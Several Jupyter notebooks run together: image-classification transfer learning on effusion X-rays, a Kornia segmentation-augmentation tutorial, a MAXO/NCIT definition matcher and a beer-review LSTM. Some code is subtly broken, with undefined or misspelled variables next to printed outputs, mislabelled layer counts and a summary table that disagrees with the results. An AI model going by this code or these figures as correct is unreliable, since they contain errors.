vgg_model_aug_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_frozen.add(layer)
vgg_model_aug_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_aug_frozen.layers[:-1]:
layer.trainable = False
vgg_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_frozen_history = vgg_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_frozen, X_test_eff_model, y_test_eff, verbose = True)
vgg_aug_frozen_acc_eff_scores.append(acc)
vgg_aug_frozen_pres_eff_scores.append(pres)
vgg_aug_frozen_recall_eff_scores.append(recall)
vgg_aug_frozen_f1_eff_scores.append(f1)
print('Accuracy of VGG augmented model while training last 1 layer: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_frozen_acc_eff_scores) * 100, np.std(vgg_aug_frozen_acc_eff_scores)*100))
print('Precision of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_frozen_pres_eff_scores), np.std(vgg_aug_frozen_pres_eff_scores)))
print('Recall of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_frozen_recall_eff_scores), np.std(vgg_aug_frozen_recall_eff_scores)))
print('f1 score of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_frozen_f1_eff_scores), np.std(vgg_aug_frozen_f1_eff_scores)))
###Output
Accuracy of VGG augmented model while training last 1 layer: 50.02 +/- 1.59%
Precision of VGG augmented model while training last 1 layer: 0.493 +/- 0.021%
Recall of VGG augmented model while training last 1 layer: 0.632 +/- 0.297%
f1 score of VGG augmented model while training last 1 layer: 0.522 +/- 0.145%
###Markdown
4.1.4 - Summary of VGG19 Model with Effusion ImagesOverall, the best VGG19 model for effusion images was the baseline model after training the last 2 layers, with an f1-score of 0.67 and recall of 0.76. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| VGG19 baseline | 53.09 +/- 1.24% | 53.111 +/- 0.000 | 57.413 +/- 5.408 | 54.928 +/- 1.630 || VGG19 with training | 63.06 +/- 1.92% | 0.531 +/- 0.000 | 0.764 +/- 0.109 | 0.672 +/- 0.019 || VGG19 augmented | 50.05 +/- 0.48% | 0.531 +/- 0.000 | 0.081 +/- 0.040 | 0.135 +/- 0.059 || VGG19 augmented with training | 50.02 +/- 1.59% | 0.531 +/- 0.000 | 0.632 +/- 0.297 | 0.522 +/- 0.145 | 4.2 - MobileNet Model for Effusion Images 4.2.1 - MobileNet Baseline for Effusion ImagesThe baseline model for MobileNet has no surprises, with similar accuracy and precisions as other baselines. The recall is slightly higher at 0.65, which increases the f1-score compared to other baselines.
###Code
mobilenet_baseline_acc_scores = []
mobilenet_baseline_pres_scores = []
mobilenet_baseline_recall_scores = []
mobilenet_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_eff_model,
y_test_eff)
mobilenet_baseline_acc_scores.append(acc)
mobilenet_baseline_pres_scores.append(pres)
mobilenet_baseline_recall_scores.append(recall)
mobilenet_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_baseline_acc_scores) * 100, np.std(mobilenet_baseline_acc_scores)*100))
print('Precision of MobileNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_baseline_pres_scores), np.std(mobilenet_baseline_pres_scores)))
print('Recall of MobileNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_baseline_recall_scores), np.std(mobilenet_baseline_recall_scores)))
print('f1 score of MobileNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_baseline_f1_scores), np.std(mobilenet_baseline_f1_scores)))
###Output
Accuracy of MobileNet baseline model: 49.72 +/- 1.53%
Precision of MobileNet baseline model: 0.488 +/- 0.022%
Recall of MobileNet baseline model: 0.655 +/- 0.324%
f1 score of MobileNet baseline model: 0.519 +/- 0.172%
###Markdown
4.2.2. - MobileNet Training Layers for Effusion ImagesUnfortunately at the time of writing, I seem to be having trouble reproducing the results I got in my preliminary work, so these metrics will be excluded from the summary table.
###Code
mobilenet_frozen_acc_scores = []
mobilenet_frozen_pres_scores = []
mobilenet_frozen_recall_scores = []
mobilenet_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_frozen.layers[:-24]:
layer.trainable = False
mobilenet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_frozen_history = mobilenet_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_frozen,
X_test_eff_model,
y_test_eff)
mobilenet_frozen_acc_scores.append(acc)
mobilenet_frozen_pres_scores.append(pres)
mobilenet_frozen_recall_scores.append(recall)
mobilenet_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet model while training last 24 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_frozen_acc_scores) * 100, np.std(mobilenet_frozen_acc_scores)*100))
print('Precision of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_frozen_pres_scores), np.std(mobilenet_frozen_pres_scores)))
print('Recall of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_frozen_recall_scores), np.std(mobilenet_frozen_recall_scores)))
print('f1 score of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_frozen_f1_scores), np.std(mobilenet_frozen_f1_scores)))
###Output
Accuracy of MobileNet model while training last 24 layers: 50.08 +/- 0.09%
Precision of MobileNet model while training last 24 layers: 0.500 +/- 0.000%
Recall of MobileNet model while training last 24 layers: 1.000 +/- 0.000%
f1 score of MobileNet model while training last 24 layers: 0.667 +/- 0.000%
###Markdown
4.2.3 - Adding Augmented Images to MobileNet for Effusion Images
###Code
mobilenet_aug_baseline_acc_scores = []
mobilenet_aug_baseline_pres_scores = []
mobilenet_aug_baseline_recall_scores = []
mobilenet_aug_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_baseline.layers:
layer.trainable = False
mobilenet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_baseline_history = mobilenet_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_aug_baseline,
X_test_eff_model,
y_test_eff)
mobilenet_aug_baseline_acc_scores.append(acc)
mobilenet_aug_baseline_pres_scores.append(pres)
mobilenet_aug_baseline_recall_scores.append(recall)
mobilenet_aug_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_baseline_acc_scores) * 100, np.std(mobilenet_aug_baseline_acc_scores)*100))
print('Precision of MobileNet augmetned baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_baseline_pres_scores), np.std(mobilenet_aug_baseline_pres_scores)))
print('Recall of MobileNet augmetned baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_baseline_recall_scores), np.std(mobilenet_aug_baseline_recall_scores)))
print('f1 score of MobileNet augmetned baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_baseline_f1_scores), np.std(mobilenet_aug_baseline_f1_scores)))
###Output
Accuracy of MobileNet augmented baseline model: 49.98 +/- 0.29%
Precision of MobileNet augmetned baseline model: 0.455 +/- 0.065%
Recall of MobileNet augmetned baseline model: 0.552 +/- 0.409%
f1 score of MobileNet augmetned baseline model: 0.417 +/- 0.284%
###Markdown
Again, I was unable to find the optimal number of layers to train, so these metrics will be removed from the summary.
###Code
mobilenet_aug_frozen_acc_scores = []
mobilenet_aug_frozen_pres_scores = []
mobilenet_aug_frozen_recall_scores = []
mobilenet_aug_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
for layer in mobilenet_model_aug_frozen.layers[:-24]:
layer.trainable = False
mobilenet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_frozen_history = mobilenet_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_aug_frozen,
X_test_eff_model,
y_test_eff)
mobilenet_aug_frozen_acc_scores.append(acc)
mobilenet_aug_frozen_pres_scores.append(pres)
mobilenet_aug_frozen_recall_scores.append(recall)
mobilenet_aug_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet augmented model while training last 24 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_frozen_acc_scores) * 100, np.std(mobilenet_aug_frozen_acc_scores)*100))
print('Precision of MobileNet augmetned model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_frozen_pres_scores), np.std(mobilenet_aug_frozen_pres_scores)))
print('Recall of MobileNet augmetned model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_frozen_recall_scores), np.std(mobilenet_aug_frozen_recall_scores)))
print('f1 score of MobileNet augmetned model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(mobilenet_aug_frozen_f1_scores), np.std(mobilenet_aug_frozen_f1_scores)))
###Output
Accuracy of MobileNet augmented model while training last 24 layers: 50.00 +/- 0.01%
Precision of MobileNet augmetned model while training last 24 layers: 0.500 +/- 0.000%
Recall of MobileNet augmetned model while training last 24 layers: 1.000 +/- 0.000%
f1 score of MobileNet augmetned model while training last 24 layers: 0.667 +/- 0.000%
###Markdown
4.2.4 - Summary of MobileNet Model with Effusion ImagesSince I was unable to optimize the number of trainable layers in this notebook, I only have the baselines of the augmented and non augmented models. This section will have to be revisted at a later date. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| MobileNet baseline | 49.72 +/- 1.53% | 0.488 +/- 0.022 | 0.655 +/- 0.324 | 0.519 +/- 0.172 || MobileNet augmented baseline | 49.98 +/- 0.29% | 0.455 +/- 0.065 | 0.552 +/- 0.409 | 0.417 +/- 0.284 | 4.3 - ResNet Model for Effusion Images 4.3.1 - ResNet Baseline for Effusion ImagesFinally, we reach the last model for effusion images. As expected, accuracy is around 50% and precision is around 0.50. The recall and f1-score however, seem to be higher than normal for a baseline.
###Code
resnet_baseline_acc_scores = []
resnet_baseline_pres_scores = []
resnet_baseline_recall_scores = []
resnet_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_baseline=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_baseline.layers:
layer.trainable = False
resnet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_baseline_history = resnet_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_baseline,
X_test_eff_model,
y_test_eff)
resnet_baseline_acc_scores.append(acc)
resnet_baseline_pres_scores.append(pres)
resnet_baseline_recall_scores.append(recall)
resnet_baseline_f1_scores.append(f1)
print('Accuracy of ResNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_baseline_acc_scores) * 100, np.std(resnet_baseline_acc_scores)*100))
print('Precision of ResNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_baseline_pres_scores), np.std(resnet_baseline_pres_scores)))
print('Recall of ResNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_baseline_recall_scores), np.std(resnet_baseline_recall_scores)))
print('f1 score of ResNet baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_baseline_f1_scores), np.std(resnet_baseline_f1_scores)))
###Output
Accuracy of ResNet baseline model: 47.50 +/- 2.92%
Precision of ResNet baseline model: 0.460 +/- 0.047%
Recall of ResNet baseline model: 0.519 +/- 0.340%
f1 score of ResNet baseline model: 0.450 +/- 0.156%
###Markdown
4.3.2 - ResNet Training Layers for Effusion ImagesWith the last 26 layers trained on the baseline ResNet model, the accuracy increases to 62%, precision rises slightly to 0.59, and recall and f1-scores rises to 0.70 and above.
###Code
resnet_frozen_acc_scores = []
resnet_frozen_pres_scores = []
resnet_frozen_recall_scores = []
resnet_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_frozen=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_frozen.layers[:-26]:
layer.trainable = False
resnet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_frozen_history = resnet_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_frozen,
X_test_eff_model,
y_test_eff)
resnet_frozen_acc_scores.append(acc)
resnet_frozen_pres_scores.append(pres)
resnet_frozen_recall_scores.append(recall)
resnet_frozen_f1_scores.append(f1)
print('Accuracy of ResNet model while training last 24 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_frozen_acc_scores) * 100, np.std(resnet_frozen_acc_scores)*100))
print('Precision of ResNet model while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_frozen_pres_scores), np.std(resnet_frozen_pres_scores)))
print('Recall of model ResNet while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_frozen_recall_scores), np.std(resnet_frozen_recall_scores)))
print('f1 score of model ResNet while training last 24 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_frozen_f1_scores), np.std(resnet_frozen_f1_scores)))
###Output
Accuracy of ResNet model while training last 24 layers: 62.76 +/- 0.11%
Precision of ResNet model while training last 24 layers: 0.585 +/- 0.002%
Recall of model ResNet while training last 24 layers: 0.878 +/- 0.009%
f1 score of model ResNet while training last 24 layers: 0.702 +/- 0.002%
###Markdown
4.3.3 - Adding Augmented Images to ResNet for Effusion ImagesThe baseline model with augmented images have slightly better metrics than the baseline model without augmentation. The metrics are still lower than those of the baseline layer with fine tuning.
###Code
resnet_aug_baseline_acc_scores = []
resnet_aug_baseline_pres_scores = []
resnet_aug_baseline_recall_scores = []
resnet_aug_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_baseline=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_aug_baseline.layers:
layer.trainable = False
resnet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_baseline_history = resnet_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_baseline,
X_test_eff_model,
y_test_eff)
resnet_aug_baseline_acc_scores.append(acc)
resnet_aug_baseline_pres_scores.append(pres)
resnet_aug_baseline_recall_scores.append(recall)
resnet_aug_baseline_f1_scores.append(f1)
print('Accuracy of ResNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_basealine_acc_scores) * 100, np.std(resnet_aug_baseline_acc_scores)*100))
print('Precision of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_baseline_pres_scores), np.std(resnet_aug_baseline_pres_scores)))
print('Recall of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_baseline_recall_scores), np.std(resnet_aug_baseline_recall_scores)))
print('f1 score of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_baseline_f1_scores), np.std(resnet_aug_baseline_f1_scores)))
###Output
Accuracy of ResNet augmented baseline model: 51.13 +/- 1.25%
Precision of ResNet augmented baseline model: 0.518 +/- 0.014%
Recall of ResNet augmented baseline model: 0.561 +/- 0.343%
f1 score of ResNet augmented baseline model: 0.471 +/- 0.202%
###Markdown
After training the last 27 images for the augmented model, all metrics are quite similar to baseline with fine tuning.
###Code
resnet_aug_frozen_acc_scores = []
resnet_aug_frozen_pres_scores = []
resnet_aug_frozen_recall_scores = []
resnet_aug_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_frozen.layers[:-27]:
layer.trainable = False
resnet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_frozen_history = resnet_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_frozen,
X_test_eff_model,
y_test_eff)
resnet_aug_frozen_acc_scores.append(acc)
resnet_aug_frozen_pres_scores.append(pres)
resnet_aug_frozen_recall_scores.append(recall)
resnet_aug_frozen_f1_scores.append(f1)
print('Accuracy of ResNet augmented model while training last 27 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_frozen_acc_scores) * 100, np.std(resnet_aug_frozen_acc_scores)*100))
print('Precision of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_frozen_pres_scores), np.std(resnet_aug_frozen_pres_scores)))
print('Recall of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_frozen_recall_scores), np.std(resnet_aug_frozen_recall_scores)))
print('f1 score of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(resnet_aug_frozen_f1_scores), np.std(resnet_aug_frozen_f1_scores)))
###Output
Accuracy of ResNet augmented model while training last 27 layers: 63.88 +/- 0.25%
Precision of ResNet augmented model while training last 27 layers: 0.606 +/- 0.007%
Recall of ResNet augmented model while training last 27 layers: 0.793 +/- 0.050%
f1 score of ResNet augmented model while training last 27 layers: 0.686 +/- 0.014%
|
data_augmenation_segmentation.ipynb | ###Markdown
[](https://colab.sandbox.google.com/github/kornia/tutorials/blob/master/source/data_augmenation_segmentation.ipynb) **Data Augmentation Semantic Segmentation**In this tutorial we will show how we can quickly perform **data augmentation for semantic segmenation** using the `kornia.augmentation` API. Install and get dataWe install Kornia and some dependencies, and download a simple data sample
###Code
%%capture
!pip install kornia opencv-python matplotlib
%%capture
!wget http://www.zemris.fer.hr/~ssegvic/multiclod/images/causevic16semseg3.png
# import the libraries
%matplotlib inline
import matplotlib.pyplot as plt
import cv2
import numpy as np
import torch
import torch.nn as nn
import kornia as K
###Output
_____no_output_____
###Markdown
Define Augmentation pipelineWe define a class to define our augmentation API using an `nn.Module`
###Code
class MyAugmentation(nn.Module):
def __init__(self):
super(MyAugmentation, self).__init__()
# we define and cache our operators as class members
self.k1 = K.augmentation.ColorJitter(0.15, 0.25, 0.25, 0.25)
self.k2 = K.augmentation.RandomAffine([-45., 45.], [0., 0.15], [0.5, 1.5], [0., 0.15])
def forward(self, img: torch.Tensor, mask: torch.Tensor) -> torch.Tensor:
# 1. apply color only in image
# 2. apply geometric tranform
img_out = self.k2(self.k1(img))
# 3. infer geometry params to mask
# TODO: this will change in future so that no need to infer params
mask_out = self.k2(mask, self.k2._params)
return img_out, mask_out
###Output
_____no_output_____
###Markdown
Load the data and apply the transforms
###Code
def load_data(data_path: str) -> torch.Tensor:
data: np.ndarray = cv2.imread(data_path, cv2.IMREAD_COLOR)
data_t: torch.Tensor = K.image_to_tensor(data, keepdim=False)
data_t = K.bgr_to_rgb(data_t)
data_t = K.normalize(data_t, 0., 255.)
img, labels = data_t[..., :571], data_t[..., 572:]
return img, labels
# load data (B, C, H, W)
img, labels = load_data("causevic16semseg3.png")
# create augmentation instance
aug = MyAugmentation()
# apply the augmenation pipelone to our batch of data
img_aug, labels_aug = aug(img, labels)
# visualize
img_out = torch.cat([img, labels], dim=-1)
plt.imshow(K.tensor_to_image(img_out))
plt.axis('off')
# generate several samples
num_samples: int = 10
for img_id in range(num_samples):
# generate data
img_aug, labels_aug = aug(img, labels)
img_out = torch.cat([img_aug, labels_aug], dim=-1)
# save data
plt.figure()
plt.imshow(K.tensor_to_image(img_out))
plt.axis('off')
plt.savefig(f"img_{img_id}.png", bbox_inches='tight')
###Output
Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers).
|
src/scripts/.ipynb_checkpoints/maxo_ncit_defs-Copy1-checkpoint.ipynb | ###Markdown
ncit_id_def.info
###Code
maxo_id_def.columns = ["Maxo_ID","?cls","ID","?def"]
print(maxo_id_def.head())
maxo_id_list= []
maxo_def_list= []
maxo_def_xref_list= []
ncit_id_list=[]
ncit_def_list= []
for index, row in maxo_id_def.iterrows():
if row[2].startswith("NCIT:"):
for index, rows in ncit_id_def.iterrows():
#determine if the the MAXO def xref matches the NCIT ID
if row[2] == rows[0]:
maxo_id_list.append(row[0])
maxo_def_list.append(row[3])
maxo_def_xref_list.append(row[2])
ncit_def_list.append(rows[2])
ncit_id_list.append(rows[0])
else:
continue
maxo_ncit_def_df=pd.DataFrame(list(zip(maxo_id_list, maxo_def_list, maxo_def_xref_list, ncit_id_list, ncit_def_list)), columns=["maxo_id","maxo_def", "maxo_def_xref","ncit_id", "ncit_def"])
print(maxo_ncit_def_df.head())
with open("maxo_ncit_def.tsv",'wb') as out:
maxo_ncit_def_df.to_csv('maxo_ncit_def.tsv', encoding='utf-8', sep='\t', index=False)
###Output
maxo_id maxo_def \
0 MAXO:0000455 The use of extreme cold to damage or destroy a...
1 MAXO:0000454 Removal, separation, detachment, extirpation, ...
2 MAXO:0000838 The determination of the ratio of the prothrom...
3 MAXO:0000146 A procedure to determine the number of cells i...
4 MAXO:0000728 A technique in which sound waves are sent out ...
maxo_def_xref ncit_id \
0 NCIT:C15215 NCIT:C15215
1 NCIT:C111157 NCIT:C111157
2 NCIT:C170591 NCIT:C170591
3 NCIT:C48938 NCIT:C48938
4 NCIT:C17644 NCIT:C17644
ncit_def
0 The use of extreme cold to damage or destroy a...
1 Removal, separation, detachment, extirpation, ...
2 The determination of the ratio of the prothrom...
3 A procedure to determine the number of cells i...
4 A technique in which sound waves are sent out ...
|
notebooks/SIS on Beer Reviews - Model Training - Aspect 1 (Aroma).ipynb | ###Markdown
SIS on Beer Reviews - Model Training Aspect 1 (Aroma)
###Code
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
import os
import sys
import gzip
sys.path.insert(0, os.path.abspath('..'))
from keras.callbacks import ModelCheckpoint
from keras.models import load_model, Model, Sequential
from keras.layers import Input, Dense, Flatten, LSTM
from keras.layers.embeddings import Embedding
from keras.optimizers import Adam
from keras.preprocessing import sequence, text
from keras import backend as K
from sklearn.model_selection import train_test_split
import os
import tensorflow as tf
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
sess = tf.Session(config=config)
K.set_session(sess)
def load_reviews(path, verbose=True):
data_x, data_y = [ ], [ ]
fopen = gzip.open if path.endswith(".gz") else open
with fopen(path) as fin:
for line in fin:
line = line.decode('ascii')
y, sep, x = line.partition("\t")
# x = x.split()
y = y.split()
if len(x) == 0: continue
y = np.asarray([ float(v) for v in y ])
data_x.append(x)
data_y.append(y)
if verbose:
print("{} examples loaded from {}".format(len(data_x), path))
print("max text length: {}".format(max(len(x) for x in data_x)))
return data_x, data_y
# Load beer review data for a particular aspect
ASPECT = 1 # 1, 2, or 3
BASE_PATH = '../data/beer_reviews'
path = os.path.join(BASE_PATH, 'reviews.aspect' + str(ASPECT))
train_path = path + '.train.txt.gz'
heldout_path = path + '.heldout.txt.gz'
X_train_texts, y_train = load_reviews(train_path)
X_test_texts, y_test = load_reviews(heldout_path)
# y value is just the sentiment for this aspect, throw away the other scores
y_train = np.array([y[ASPECT] for y in y_train])
y_test = np.array([y[ASPECT] for y in y_test])
# Create a 3k validation set held-out from the test set
X_test_texts, X_val_texts, y_test, y_val = train_test_split(
X_test_texts,
y_test,
test_size=3000,
random_state=42)
plt.hist(y_train)
plt.show()
print('Mean: %.3f' % np.mean(y_train))
print('Median: %.3f' % np.median(y_train))
print('Stdev: %.3f' % np.std(y_train))
print('Review length:')
train_texts_lengths = [len(x.split(' ')) for x in X_train_texts]
print("Mean %.2f words (stddev: %f)" % \
(np.mean(train_texts_lengths),
np.std(train_texts_lengths)))
# plot review lengths
plt.boxplot(train_texts_lengths)
plt.show()
# Tokenize the texts and keep only the top n words
TOP_WORDS = 10000
tokenizer = text.Tokenizer(num_words=TOP_WORDS)
tokenizer.fit_on_texts(X_train_texts)
X_train = tokenizer.texts_to_sequences(X_train_texts)
X_val = tokenizer.texts_to_sequences(X_val_texts)
X_test = tokenizer.texts_to_sequences(X_test_texts)
print(len(X_train))
print(len(X_val))
print(len(X_test))
# Bound reviews at 500 words, truncating longer reviews and zero-padding shorter reviews
MAX_WORDS = 500
X_train = sequence.pad_sequences(X_train, maxlen=MAX_WORDS)
X_val = sequence.pad_sequences(X_val, maxlen=MAX_WORDS)
X_test = sequence.pad_sequences(X_test, maxlen=MAX_WORDS)
index_to_token = {tokenizer.word_index[k]: k for k in tokenizer.word_index.keys()}
###Output
_____no_output_____
###Markdown
LSTM Model
###Code
def coeff_determination_metric(y_true, y_pred):
SS_res = K.sum(K.square( y_true-y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
# LSTM 200
def make_lstm_model(top_words, max_words):
model = Sequential()
model.add(Embedding(top_words, 100, input_length=max_words))
model.add(LSTM(200, return_sequences=True))
model.add(LSTM(200))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='mse',
optimizer=Adam(),
metrics=['mse', 'mae', coeff_determination_metric])
return model
model = make_lstm_model(TOP_WORDS, MAX_WORDS)
print(model.summary())
checkpointer = ModelCheckpoint(filepath='../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.{epoch:02d}-{val_loss:.4f}.hdf5',
verbose=1,
monitor='val_loss',
save_best_only=True)
model.fit(X_train, y_train,
validation_data=(X_val, y_val),
epochs=15,
batch_size=128,
callbacks=[checkpointer],
verbose=1)
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_3 (Embedding) (None, 500, 100) 1000000
_________________________________________________________________
lstm_5 (LSTM) (None, 500, 200) 240800
_________________________________________________________________
lstm_6 (LSTM) (None, 200) 320800
_________________________________________________________________
dense_3 (Dense) (None, 1) 201
=================================================================
Total params: 1,561,801
